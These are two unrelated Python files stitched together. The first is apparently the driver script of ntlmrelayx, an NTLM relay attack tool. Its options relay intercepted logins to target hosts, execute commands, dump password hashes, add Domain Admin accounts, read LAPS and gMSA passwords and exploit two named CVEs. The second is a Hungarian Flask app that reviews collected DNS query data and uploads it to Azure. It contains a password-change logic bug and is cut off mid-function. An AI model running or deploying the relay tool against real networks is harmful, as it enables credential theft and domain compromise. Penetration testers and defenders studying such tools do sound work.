# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to be working on any LM Compatibility level. The only way
# to stop this attack is to enforce on the server SPN checks and or signing.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_finished_attacks(self, line):
for url in self.relayConfig.target.finishedAttacks:
print (url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setDisableMulti(options.disable_multi)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid)
c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setSMBChallenge(options.ntlmchallenge)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
c.setIsADCSAttack(options.adcs)
c.setADCSOptions(options.template)
c.setIsShadowCredentialsAttack(options.shadow_credentials)
c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type, options.cert_outfile_path)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
elif server is WCFRelayServer:
c.setListeningPort(options.wcf_port)
elif server is RAWRelayServer:
c.setListeningPort(options.raw_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
if isinstance(thread, tuple(RELAY_SERVERS)):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help="Target to relay the credentials to, "
"can be an IP, hostname or URL like domain\\username@host:port (domain\\username and port "
"are optional, and don't forget to escape the '\\'). If unspecified, it will relay back "
"to the client')")
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient or LDAP console instead'
'of executing a command after a successful relay. This console will listen locally on a '
' tcp port and can be reached with for example netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_argument_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')
serversoptions.add_argument('--no-raw-server', action='store_true', help='Disables the RAW server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389) # ADWS
parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support')
parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the '
'SMB Server (16 hex bytes long. eg: 1122334455667788)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store', type=int, default=1, help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file. (default=1)')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')
parser.add_argument('--disable-multi', action="store_true", required=False, help='If set, disable multi-host relay')
parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
' in the same directory). For RPC no output will be provided.')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#RPC arguments
rpcoptions = parser.add_argument_group("RPC client options")
rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
help='Use this credential to authenticate to SMB (low-privilege account)')
rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
'(can specify multiple)')
#HTTPS options
httpoptions = parser.add_argument_group("HTTP options")
httpoptions.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
httpoptions.add_argument('-remove-target', action='store_true', default=False,
help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
# AD CS options
adcsoptions = parser.add_argument_group("AD CS attack options")
adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, help='AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`')
# Shadow Credentials attack options
shadowcredentials = parser.add_argument_group("Shadow Credentials attack options")
shadowcredentials.add_argument('--shadow-credentials', action='store_true', required=False,
help='Enable Shadow Credentials relay attack (msDS-KeyCredentialLink manipulation for PKINIT pre-authentication)')
shadowcredentials.add_argument('--shadow-target', action='store', required=False, help='target account (user or computer$) to populate msDS-KeyCredentialLink from')
shadowcredentials.add_argument('--pfx-password', action='store', required=False,
help='password for the PFX stored self-signed certificate (will be random if not set, not needed when exporting to PEM)')
shadowcredentials.add_argument('--export-type', action='store', required=False, choices=["PEM", " PFX"], type=lambda choice: choice.upper(), default="PFX",
help='choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX))')
shadowcredentials.add_argument('--cert-outfile-path', action='store', required=False, help='filename to store the generated self-signed PEM or PFX certificate and key')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.rpc_use_smb and not options.auth_smb:
logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if not options.no_wcf_server:
RELAY_SERVERS.append(WCFRelayServer)
if not options.no_raw_server:
RELAY_SERVERS.append(RAWRelayServer)
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
adatgyujtes.py
|
#!/usr/bin/env python
import datetime
import json
import math
import operator
import optparse
import os
import re
import shutil
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
import pdb
# Py3k compat.
if sys.version_info[0] == 3:
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
else:
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for, Response)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version <= (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
'Please update by running pip install --update '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import sqlite3
from playhouse.dataset import DataSet
from playhouse.migrate import migrate
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
import config
CONFIG = None
app = Flask(
__name__,
static_folder=os.path.join(CUR_DIR, 'static'),
template_folder=os.path.join(CUR_DIR, 'templates'))
app.config.from_object(__name__)
dataset = None
live_dataset = None
migrator = None
offset = 0
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
db_file = dataset._database.database
if db_file.startswith('file:'):
db_file = db_file[5:]
return os.path.realpath(db_file.rsplit('?', 1)[0])
@property
def is_readonly(self):
db_file = dataset._database.database
return db_file.endswith('?mode=ro')
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html', sqlite=sqlite3)
@app.route('/thanks/')
def thanks():
return render_template('thanks.html')
@app.route('/faq/')
def faq():
return render_template('faq.html')
import nacl.pwhash
import nacl.hash
import nacl.utils
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
try:
nacl.pwhash.verify(CONFIG.password, request.form.get('password').encode())
session['authorized'] = True
return redirect(session.get('next_url') or url_for('index'))
except nacl.exceptions.InvalidkeyError:
flash('A megadott jelszó helytelen.', 'danger')
return render_template('login.html')
@app.route('/changepw/', methods=['GET', 'POST'])
def changepw():
if request.method == 'POST':
try:
nacl.pwhash.verify(CONFIG.password, request.form.get('oldpassword').encode())
if request.form.get('newpassword') != request.form.get('newpasswordc'):
flash('A megadott jelszavak nem egyeznek!', 'danger')
if len(request.form.get('newpassword')) > 16 or len(request.form.get('newpassword')) < 4 :
flash('A jelszó 4-16 karakter hosszúságú kell hogy legyen.', 'danger')
else:
CONFIG.change_password(request.form.get('newpassword'))
flash('A jelszó sikeresen megváltoztatásra került!', 'success')
except nacl.exceptions.InvalidkeyError:
flash('A megadott jelszó helytelen.', 'danger')
return render_template('changepw.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/stop_collecting/')
def stop_collecting():
return render_template('stop_collecting.html')
@app.route('/copy/')
def create_copy_queries():
global dataset
global migrator
shutil.copy(CONFIG.database_path, CONFIG.copied_database_path)
dataset = SqliteDataSet('sqlite:///{path}'.format(path=CONFIG.copied_database_path), bare_fields=True)
migrator = dataset._migrator
return redirect(url_for('table_domains'), code=302)
import procbridge
@app.route('/domains/')
def table_domains():
table = "queries"
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
rows_per_page = app.config['ROWS_PER_PAGE']
dom_field = None
if ('domain' in ds_table.model_class._meta.fields):
dom_field = ds_table.model_class._meta.fields['domain']
delete_domain = request.args.get('delete')
if delete_domain:
ds_table.delete(domain=delete_domain)
#open_live_dataset_table(table).delete(domain=delete_domain)
client = procbridge.Client('127.0.0.1', CONFIG.proc_port)
response = client.request('delete_domain', {'domain': delete_domain})
if response != 'OK':
flash('Nem sikerült végrehajtani a törlés utasítást. Kérjük próbálja meg újra!')
search = request.args.get('search')
if search:
query = ds_table.model_class.select(dom_field, fn.COUNT(dom_field).alias('ct')).group_by(dom_field).where(dom_field.contains(search)).order_by(fn.COUNT(dom_field).desc())
else:
query = ds_table.model_class.select(dom_field, fn.COUNT(dom_field).alias('ct')).group_by(dom_field).order_by(fn.COUNT(dom_field).desc())
#pdb.set_trace()
total_rows = query.count()
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = query.paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_domains.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
total_pages=total_pages,
total_rows=total_rows,
search=search,
true_content=None)
import azure.storage.blob as blob
import azure.storage.common as common
@app.route('/upload/')
def upload_page():
return render_template(
"upload.html",
upload_path="example.path")
import threading
import requests
import queue
import encryption
import zipfile
import random
from event import QueueEvent
progress_queue = queue.Queue()
global_lock = threading.Lock()
def queue_event_data(data):
"""Queue an SSE with dictionary data"""
print("Queuing {}".format(data), file=sys.stderr)
progress_queue.put(QueueEvent(json.dumps(data)))
time.sleep(0)
def progress_callback(current, total):
"""Put the Azure upload progress into the inter-thread queue"""
print("Progress callback.", file=sys.stderr)
queue_event_data({
"type": "upload_progress",
"progress_data": {
"current": current,
"total": total,
"finished": total <= current
}
})
def get_azure_credentials():
"""Get the Azure credentials for the storage account"""
# Get the credentials from the Azure API endpoint
credentials = requests.post(url=CONFIG.sas_url, json={"id": CONFIG.adatgyujtes_id}).json()
# In case of a server error the API responds with a JSON with an error field in it
if "error" in credentials:
raise Exception("Nem tudtuk hitelesíteni az eszközt: " + credentials["error"])
return credentials
def zip_database():
"""Zip up the database"""
with zipfile.ZipFile(CONFIG.zipped_db_name, 'w', zipfile.ZIP_DEFLATED) as dbzip:
dbzip.write(CONFIG.database_path)
def init_key_resolver(credentials):
"""Load the key resolver from the received credentials"""
# The encode method must be called on the key, since it is a string and we need bytes here
key = credentials["rsaPublicKey"].replace(r'\n','\n').encode()
print("KEY is: ", key)
kek = encryption.PublicRSAKeyWrapper(public_key=key)
key_resolver = encryption.KeyResolver()
key_resolver.put_key(key=kek)
return kek, key_resolver.resolve_key
def init_blob_service(credentials):
# Initialize the blob service from the Azure SDK
blobService = blob.BlockBlobService(account_name=credentials["accountName"], account_key=None, sas_token=credentials["sasToken"])
# Load the public key for the encryption. The key resolver object implements a specific interface defined by the Azure SDK
# This would be an unnecessary overhead since we only have the one public key, but there's no way around it
blobService.key_encryption_key, blobService.key_resolver_function = init_key_resolver(credentials=credentials)
# Change the upload parameters, so that the progress callback gets called more frequently, this might also raise the robustness of the upload
blobService.MAX_SINGLE_PUT_SIZE = 4*1024*1024
blobService.MAX_BLOCK_SIZE = 4*1024*1024
return blobService
def upload_task():
"""Start the database upload."""
try:
# Acquire global lock.
if not global_lock.acquire(False):
raise AssertionError("Couldn't acquire global lock.")
# Zip database
print("Zipping database...", file=sys.stderr)
queue_event_data({
"type": "started",
"subject": "compress"
})
zip_database()
queue_event_data({
"type": "completed",
"subject": "compress"
})
# Get Azure credentials
print("Getting credentials...", file=sys.stderr)
queue_event_data({
"type": "started",
"subject": "authenticate"
})
credentials = get_azure_credentials()
if all(s in credentials for s in ('accountName', 'sasToken', 'containerName', 'id', 'rsaPublicKey')):
# Initialize the Azure blob service
print("Initializing Azure blob service...", file=sys.stderr)
blobService = init_blob_service(credentials=credentials)
queue_event_data({
"type": "completed",
"subject": "authenticate"
})
queue_event_data({
"type": "started",
"subject": "upload"
})
# Create the blob
blobService.create_blob_from_path(
container_name=credentials["containerName"],
blob_name=nacl.hash.sha256(nacl.utils.random(64)).decode()[:24],
file_path=CONFIG.zipped_db_name,
progress_callback=progress_callback,
timeout=200)
queue_event_data({
"type": "completed",
"subject": "upload"
})
delete_file(CONFIG.zipped_db_name)
else:
raise AssertionError("Incorrect Azure credentials received.")
# Release global lock
global_lock.release()
print("Upload finished.", file=sys.stderr)
except Exception as e:
print(e, file=sys.stderr)
queue_event_data({
"type": "error",
"message": str(e)
})
finally:
# We absolutely have to release the lock, even if an error occurs
if global_lock.locked():
global_lock.release()
def start_upload():
"""Upload the database to an Azure blob container."""
# Lock object so a duplicate upload can't be started
global global_lock
try:
# Check if the lock is open
if global_lock.locked():
raise AssertionError("Global lock is locked. Upload probably already underway.")
# Start the upload in a separate thread
print("Starting upload thread...", file=sys.stderr)
threading.Thread(target=upload_task).start()
except AssertionError as ae:
print(ae, file=sys.stderr)
raise ae
@app.route('/upload_database/')
def upload_database():
"""Simple endpoint that starts the upload in a separate thread."""
try:
print("Trying to start upload thread...", file=sys.stderr)
start_upload()
# If the upload started successfully, notify the client about it
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
except Exception as ex:
print(ex, file=sys.stderr)
return json.dumps({'success':False, 'error_message': str(ex)}), 409, {'ContentType':'application/json'}
@app.route('/upload_progress/')
def upload_progress():
"""Keep the client up to date about the progress of the upload."""
try:
def upload_event_stream():
"""Async event stream callback."""
try:
stream_active = True
while stream_active:
print("Event stream callback.", file=sys.stderr)
# Get upload progress from inter-thread queue
progress_data = progress_queue.get(block=True, timeout=30)
print("Yielding: {}".format(progress_data.message()), file=sys.stderr)
# Send the progress to the client
yield progress_data.message()
if ("error" in progress_data.message() or '"type": "completed", "subject": "upload"' in progress_data.message()):
stream_active = False
except Exception as ex:
print("Event stream encountered an error." + str(ex), file=sys.stderr)
stream_active = False
return Response(upload_event_stream(), mimetype='text/event-stream')
except Exception as ex:
print(ex, file=sys.stderr)
return str(ex), 500, {'ContentType':'application/json'}
@app.route('/timezone/')
def timezone_information():
global offset
offset = request.args.get('offset') or 0
offset = int(offset)
print("Offset is: ", offset)
# If the upload started successfully, notify the client about it
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
def open_live_dataset_table(table):
# Opening live dataset for delete to remain persistent
live_dataset.connect()
live_dataset.update_cache(table)
return live_dataset[table]
@app.route('/queries/')
def table_queries():
table="queries"
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
rows_per_page = app.config['ROWS_PER_PAGE']
delete_index = request.args.get('delete')
if delete_index:
ds_table.delete(id=delete_index)
#open_live_dataset_table(table).delete(id=delete_index)
client = procbridge.Client('127.0.0.1', CONFIG.proc_port)
response = client.request('delete_id', {'id': int(delete_index)})
if response != 'OK':
flash('Nem sikerült végrehajtani a törlés utasítást. Kérjük próbálja meg újra!')
search = request.args.get('search')
if search:
query = ds_table.model_class.select().where(ds_table.model_class._meta.fields['domain'].contains(search))
else:
query = ds_table.all()
total_rows = query.count()
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
